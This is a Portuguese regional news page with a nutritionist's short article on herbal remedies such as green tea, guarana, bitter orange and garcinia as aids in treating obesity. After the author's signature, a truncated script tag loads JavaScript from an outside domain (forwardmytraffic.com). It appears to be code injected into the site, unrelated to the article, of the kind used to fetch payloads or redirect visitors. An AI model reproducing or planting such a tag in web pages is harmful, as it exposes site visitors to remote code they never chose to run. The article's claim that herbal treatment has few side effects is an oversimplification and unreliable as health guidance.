InícioUncategorizedFitoterápicos no Tratamento da Obesidade

Fitoterápicos no Tratamento da Obesidade

Últimas notícias

Veículo é encontrado queimado em Três Barras

Na manhã desta quarta-feira, 17,  os bombeiros de Três...

Polícia Militar registra três ocorrência de posse de droga no mesmo dia em Três Barras

Nesta  terça-feira, 16, três ocorrências de posse de drogas...

A fitoterapia está sendo utilizada cada vez mais pela população mundial, é considerada uma terapia que utiliza plantas medicinais no tratamento e cura de doenças. As formas de prescrição são plantas in natura frescas, ou como droga vegetal nas suas diferentes formas farmacêuticas. Essas formas são obtidas, através de tratamento mecânico, calor ou por solventes. Seu uso é feito por infusão (usada para folhas, frutos e flores), extrato (material vegetal), tinturas (preparada com a planta seca) e alcoolatura (preparada com planta fresca).

 

 

A fitoterapia é um meio para tratar a obesidade, devido seu baixo custo e poucos efeitos colaterais. A obesidade é o acúmulo excessivo de tecido adiposo no organismo e pode ocorrer devido a aspectos genéticos, sociais e comportamentais, é uma enfermidade multifatorial e tem um tratamento complexo, com grande chance de insucesso, em grande parte por estratégias equivocadas e pelo uso insuficiente dos recursos terapêuticos.

 

 

Os medicamentos fitoterápicos utilizados para emagrecimento agem no organismo como moderadores de apetite ou aceleradores de metabolismo, promovendo redução da ingestão alimentar e aumento do gasto energético. Alguns dos fitoterápicos utilizados para o emagrecimento e obesidade são: Camellia Sinensis (chá verde), Paullinia cupana Kunth (Guaraná), Citrus Aurantim (Laranja Amarga), Hibiscus, Chlorella, Garcinia Cambogia, Pholia magra, entre outros. Lembrando, que os fitoterápicos são coadjuvantes no tratamento da obesidade, devem ser utilizados juntamente com uma alimentação adequada.

 

 

Recomenda-se cuidado na opção pela fitoterapia, pois, sua utilização inadequada, pode acarretar graves problemas à saúde. Por isso, sempre procure um profissional qualificado para que haja a correta prescrição.

 

Nutricionista Caroline Pacheco

CRN 5186

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.